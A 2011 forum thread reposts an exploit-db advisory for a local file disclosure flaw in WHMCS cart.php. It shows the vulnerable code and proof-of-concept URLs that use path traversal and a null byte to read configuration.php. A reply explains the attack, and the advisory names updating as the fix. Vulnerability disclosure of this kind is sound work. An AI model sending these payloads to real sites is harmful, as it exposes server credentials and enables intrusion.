Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / NewStats: 3,171,706 members, 7,882,414 topics. Date: Sunday, 07 July 2024 at 02:24 AM |
Nairaland Forum / Science/Technology / Webmasters / Whmcompletesolution (cart.php) Local File Disclosure (4968 Views)
Liberty Reserve Payment Module For Interspire Shopping Cart. / Integrating Interswitch's Webpay With Joomla's Virtuemart(shopping Cart) / Which Open Source Shopping Cart Would You Choose? (2) (3) (4)
(1) (Reply)
Whmcompletesolution (cart.php) Local File Disclosure by Slyr0x: 11:13am On Oct 20, 2011 |
# Title : WHMCompleteSolution (cart.php) Local File Disclosure # Author : Lagripe-Dz # Product : WHMCS ( WHMCompleteSolution ) # Vendor : http://whmcs.com/ # Date : 10/01/2011 # Version : 3.x.x , 4.0.x # Tested on : linux+apache ================================================================ Vuln file: cart.php --------- Vuln code: --------- if ( $a == "add" ) { $templatefile = "configureproductdomain"; , etc } if ( $a == "login" ) { $templatefile = "login"; , etc } , outputClientArea( $templatefile, $nowrapper ); # outputClientArea function will display "./templates/orderforms/cart/{$templatefile}.tpl" Details : --------- if variable "$a" has a true value , will set "$templatefile" value by default but when "$a" value didn't match the defaults values you can control "$templatefile" and use it as ( File Disclosure ) Proof of Concept : ------------------ http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00 http://domain.tld/[PATH]/cart.php?a=test&templatefile=, /, /, /configuration.php%00 note* : show the page source to see Disclosure file. Solution : ---------- Update to the latest version http://www.exploit-db.com/exploits/17999/ |
Re: Whmcompletesolution (cart.php) Local File Disclosure by Slyr0x: 11:20am On Oct 20, 2011 |
So it won't look like I posted Jargons, lemme just explain. Basically there is a Local File Disclosure vulnerability in WHMCS Versions - 3.x.x , 4.0.x. How does it work? An attacker can pull off "sensitive files" off your server with this exploit below "/cart.php?a=test&templatefile=, /, /, /configuration.php%00" by doing this http://example.com/cart.php?a=test&templatefile=, /, /, /configuration.php%00 where http://example.com is the vulnerable WHMCS site. |
Re: Whmcompletesolution (cart.php) Local File Disclosure by gorimapa1(m): 3:58pm On Oct 20, 2011 |
Karamba |
(1) (Reply)
College Of Agriculture And Animal Science Bakura Zamfara State / Best SEO Techniques Explained / 4 Possible Reasons First-Time Bloggers Fail
(Go Up)
Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health religion celebs tv-movies music-radio literature webmasters programming techmarket Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10) Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 7 |